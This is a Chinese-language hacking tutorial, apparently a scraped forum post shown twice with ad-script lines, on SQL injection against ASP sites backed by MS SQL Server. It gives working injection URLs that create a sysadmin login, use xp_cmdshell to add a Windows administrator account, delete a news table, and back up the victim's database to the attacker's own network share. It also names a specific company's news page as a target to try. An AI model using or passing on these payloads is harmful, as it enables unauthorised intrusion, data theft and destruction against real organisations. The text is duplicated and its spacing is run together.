<script type="text/javascript">
</script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
对于国内外的很多新闻,BBS和电子商务都采用+ SQL,而写
ASP的程序员很多(有很多刚刚毕业的),所以,ASP+ SQL的攻击成功率
也比较高。这类攻击方法与NT的版本和 SQL的版本没有多大的关系,也没有相应的补丁,因为漏洞是程序员自己造成的,而且大多数讲解ASP编
程的书上,源代码例子就有这个漏洞存在,其实只是一些合法的ASP对 SQL的请求,就留下后患无穷!
这种攻击方法最早源于or1=1的漏洞(我们暂且称其为漏洞),这个漏洞的原理我想大家因该都知道了,那么随之而来的便是;exec
sp_addloginhax(在数据库内添加一个hax用户),但是这个方法的限制很大,首先ASP使用的 SQL
Server账号是个管理员,其次请求的提交变
量在整个 SQL语句的最后,因为有一些程序员采用SELECT*FROMnewsWHEREid=...ANDtopic=...
AND.....
这种方法请求数据库,那么如果还用以上的例子就会
news.asp?id=2;execsp_addloginhax
变成SELECT*FROMnewsWHEREid=2;execsp_addloginhaxANDtopic=...
AND...
整个 SQL语句在执行sp_addlogin的存储过程后有AND与判断存在,语法错误,你的sp_addlogin自然也不能正常运行了,因此试试看下面这个方
法
news.asp?id=2;execsp_addloginhax;--
后面的--符号把sp_addlogin后的判断语句变成了注释,这样就不会有语法错误了,sp_addlogin正常执行!
那么我们连一起来用吧
news.asp?id=2;execmaster.dbo.sp_addloginhax;--
news.asp?id=2;execmaster.dbo.sp_passwordnull,hax,hax;--
news.asp?id=2;execmaster.dbo.sp_addsrvrolemembersysadminhax;--
news.asp?id=2;execmaster.dbo.xp_cmdshellnetuserhaxhax
/workstations:*/times:all/passwordchg:yes/passwordreq:yes
/active:yes/add;--
news.asp?id=2;execmaster.dbo.xp_cmdshellnetlocalgroup
administratorshax/add;--
这样,你在他的数据库和系统内都留下了hax管理员账号了
当然,前提条件是ASP用管理员账号,所以虚拟空间大家就别试了,不会存在这个漏洞的。
以后我们会讨论,如果对方的ASP不是用 SQL管理员账号,我们如何入侵,当然也会涉及到1433端口的入侵
当然大家可以试试看在id=2后面加上一个符号,主要看对方的ASP怎么写了
再说说当ASP程序使用的 SQL账号不是管理员的时候我们该如何做。
你如天融信的主页,有新闻内容,如下:
http://www.talentit.com.cn/news/news-2.asp?newid=117
大家可以试试看http://www.talentit.com.cn/news/news-2.asp?newid=117;select
123;--
呵呵,报语法错误,select123错误,显而易见,天融新的ASP在newid变量后面用号结束
那么试试看http://www.talentit.com.cn/news/news-2.asp?newid=117;delete
news;--
哈哈,我想只要表名猜对了,新闻库就被删了
通常ASP用的 SQL账号就算不是管理员也会是某个数据库的owner,至少对于这个库有很高的管理权限
但是我们不知道库名该怎么?看看db_name()函数吧
打开你的queryanalyzer,看看printdb_name(),呵呵,当前的数据库名就出来了
以次类推,如下:declare@asysname;set@a=db_name();backupdatabase@ato
disk=你的IP你的共享目录bak.dat,name=test;--
呵呵,他的当前数据库就备份到你的硬盘上了,接下来要做的大家心里都明白了吧
同理这个方法可以找到对方的 SQL的IP
先装一个,打开ICMP和139TCP和445TCP的警告提示
然后试试看news.asp?id=2;execmaster.dbo.xp_cmdshellping你的IP
如果防火墙提示有人ping你,那么因该可以肯定对方的ASP用的是 SQL的管理员权限,同时也确定了对方的 SQL
Server的准确位置,因为很多大
一点的网站考虑性能,会吧web服务和数据库分开,当对方大上了补丁看不到源代码时,我想只有这个方法能很快的定位对方的 SQL 1 <script type="text/javascript"> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
<script type="text/javascript">
</script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
具体内容:
对于国内外的很多新闻,BBS和电子商务都采用+ SQL,而写
ASP的程序员很多(有很多刚刚毕业的),所以,ASP+ SQL的攻击成功率
也比较高。这类攻击方法与NT的版本和 SQL的版本没有多大的关系,也没有相应的补丁,因为漏洞是程序员自己造成的,而且大多数讲解ASP编
程的书上,源代码例子就有这个漏洞存在,其实只是一些合法的ASP对 SQL的请求,就留下后患无穷!
这种攻击方法最早源于or1=1的漏洞(我们暂且称其为漏洞),这个漏洞的原理我想大家因该都知道了,那么随之而来的便是;exec
sp_addloginhax(在数据库内添加一个hax用户),但是这个方法的限制很大,首先ASP使用的 SQL
Server账号是个管理员,其次请求的提交变
量在整个 SQL语句的最后,因为有一些程序员采用SELECT*FROMnewsWHEREid=...ANDtopic=...
AND.....
这种方法请求数据库,那么如果还用以上的例子就会
news.asp?id=2;execsp_addloginhax
变成SELECT*FROMnewsWHEREid=2;execsp_addloginhaxANDtopic=...
AND...
整个 SQL语句在执行sp_addlogin的存储过程后有AND与判断存在,语法错误,你的sp_addlogin自然也不能正常运行了,因此试试看下面这个方
法
news.asp?id=2;execsp_addloginhax;--
后面的--符号把sp_addlogin后的判断语句变成了注释,这样就不会有语法错误了,sp_addlogin正常执行!
那么我们连一起来用吧
news.asp?id=2;execmaster.dbo.sp_addloginhax;--
news.asp?id=2;execmaster.dbo.sp_passwordnull,hax,hax;--
news.asp?id=2;execmaster.dbo.sp_addsrvrolemembersysadminhax;--
news.asp?id=2;execmaster.dbo.xp_cmdshellnetuserhaxhax
/workstations:*/times:all/passwordchg:yes/passwordreq:yes
/active:yes/add;--
news.asp?id=2;execmaster.dbo.xp_cmdshellnetlocalgroup
administratorshax/add;--
这样,你在他的数据库和系统内都留下了hax管理员账号了
当然,前提条件是ASP用管理员账号,所以虚拟空间大家就别试了,不会存在这个漏洞的。
以后我们会讨论,如果对方的ASP不是用 SQL管理员账号,我们如何入侵,当然也会涉及到1433端口的入侵
当然大家可以试试看在id=2后面加上一个符号,主要看对方的ASP怎么写了
再说说当ASP程序使用的 SQL账号不是管理员的时候我们该如何做。
你如天融信的主页,有新闻内容,如下:
http://www.talentit.com.cn/news/news-2.asp?newid=117
大家可以试试看http://www.talentit.com.cn/news/news-2.asp?newid=117;select
123;--
呵呵,报语法错误,select123错误,显而易见,天融新的ASP在newid变量后面用号结束
那么试试看http://www.talentit.com.cn/news/news-2.asp?newid=117;delete
news;--
哈哈,我想只要表名猜对了,新闻库就被删了
通常ASP用的 SQL账号就算不是管理员也会是某个数据库的owner,至少对于这个库有很高的管理权限
但是我们不知道库名该怎么?看看db_name()函数吧
打开你的queryanalyzer,看看printdb_name(),呵呵,当前的数据库名就出来了
以次类推,如下:declare@asysname;set@a=db_name();backupdatabase@ato
disk=你的IP你的共享目录bak.dat,name=test;--
呵呵,他的当前数据库就备份到你的硬盘上了,接下来要做的大家心里都明白了吧
同理这个方法可以找到对方的 SQL的IP
先装一个,打开ICMP和139TCP和445TCP的警告提示
然后试试看news.asp?id=2;execmaster.dbo.xp_cmdshellping你的IP
如果防火墙提示有人ping你,那么因该可以肯定对方的ASP用的是 SQL的管理员权限,同时也确定了对方的 SQL
Server的准确位置,因为很多大
一点的网站考虑性能,会吧web服务和数据库分开,当对方大上了补丁看不到源代码时,我想只有这个方法能很快的定位对方的 SQL 1 <script type="text/javascript"> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
<script type="text/javascript">
</script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
1157
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
